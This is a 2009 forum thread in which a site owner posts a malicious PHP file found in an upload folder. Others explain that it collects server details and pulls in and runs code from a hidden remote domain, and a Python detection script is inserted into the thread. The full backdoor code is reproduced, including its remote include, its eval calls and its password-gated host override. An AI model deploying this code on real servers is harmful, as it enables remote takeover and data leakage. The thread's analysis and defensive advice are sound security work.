Beedge Posted March 5, 2009

I found a file with the following code on my server in a folder with MOD 777. I suspect it is a hacking attempt. Can anyone tell me what's going on? Thanks~!

```php
<?
error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="ade11da1971ab70623dbc41f2836aa7c") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{
$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o=curl_exec($cu);
curl_close($cu);
eval($o);
};
die();
?>
```

rhodesa Posted March 5, 2009

Yeah, the code is trying to include a file from http://ads3.phpsearch.cn and include with it a bunch of stats about your system.

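What rhodesa describes can be confirmed without executing the file. The following is an added example, not part of the original thread or any poster's code: a Python static triage that decodes the `base64_decode()` literals and flags the combination of indicators seen in this file. The indicator names, the threshold of three, and the abridged `SAMPLE` are assumptions made for this example.

```python
import base64
import binascii
import re

# Constructed input: abridged lines of the file posted above (same literals).
SAMPLE = r'''<? error_reporting(0);
$f=base64_decode("cGhwc2VhcmNoLmNu");
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{ $cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
$o=curl_exec($cu); eval($o); }; die(); ?>'''

B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')

# Heuristic indicators (hypothetical names): weak alone, strong in combination.
INDICATORS = {
    "short_open_tag": re.compile(r'<\?(?!php|xml|=)'),
    "errors_silenced": re.compile(r'error_reporting\(\s*0\s*\)'),
    "eval_call": re.compile(r'\beval\s*\('),
    "include_of_decoded_string": re.compile(
        r'\b(?:include|require)(?:_once)?\s*\(?\s*\(?\s*base64_decode'),
    "remote_fetch": re.compile(
        r'\b(?:curl_init|file_get_contents)\s*\(\s*base64_decode'),
}

def decode_literals(source):
    """Return every base64_decode("...") string literal, decoded to text."""
    decoded = []
    for literal in B64_CALL.findall(source):
        try:
            raw = base64.b64decode(literal, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64; leave for manual review
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded

def triage(source):
    """Summarise one file: matched indicators plus decoded literals."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(source))
    literals = decode_literals(source)
    return {
        "indicators": hits,
        "decoded": literals,
        "builds_url": any(s.startswith(("http://", "https://")) for s in literals),
        "suspicious": len(hits) >= 3,  # assumed threshold
    }

if __name__ == "__main__":
    print(triage(SAMPLE))
```

The decoded literals show that the file concatenates three URL prefixes with one domain, so the same check is worth running over every file in a world-writable upload folder.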
Mchl Posted March 5, 2009

Oh my. I just love the content of this page.

> What is this site?
> This site helps webmasters to earn money with their sites.
> How it works?
> Our program generate traffic from search engines and display advertising.
> What shell I do to start with you ?
> Signup, get php file from member area, put file into your website directory, modify or create .htaccess in the same directory, and receive money ! it's that easy!

XD

Beedge (Author) Posted March 5, 2009

Any suggestions on any measures I could take to make my site safe from this?

kickstart Posted March 5, 2009

Hi

Assuming it is a dodgy site (and I wouldn't trust it) then just delete it. However, you could do with knowing how it got there in the first place.

All the best

Keith

kenrbnsn Posted March 5, 2009

Another reason to turn off short tags... With short tags off, this code would never be executed...

Ken

kickstart Posted March 5, 2009

Hi

Bit more of a look and it appears that the page it goes to is http://ads3.phpsearch.cn (as mentioned by rhodesa). However, if you go directly there it does a redirect elsewhere (puts /en/ on the end), unless you put a random query string on the end, when it does nothing.

All the best

Keith

rhodesa Posted March 5, 2009

haha... it has a report abuse link...

Beedge (Author) Posted March 5, 2009

I think the worrying thing is how did it get on my server in the first place...? And how can I prevent similar scripts saving themselves on it? I have to make the folder writable because the app on the server allows users to upload files to this folder. Any suggestions?

kickstart Posted March 5, 2009

Hi

How locked down are the scripts that allow users to do uploads?

All the best

Keith

rhodesa Posted March 5, 2009

Well... my first guess would be that they exploited your uploader. What does your upload code do to verify the stuff being uploaded is acceptable?

waynew Posted March 5, 2009

Post your upload code and I'm sure we'll see if it's safe or not. Also, change your FTP details just in case.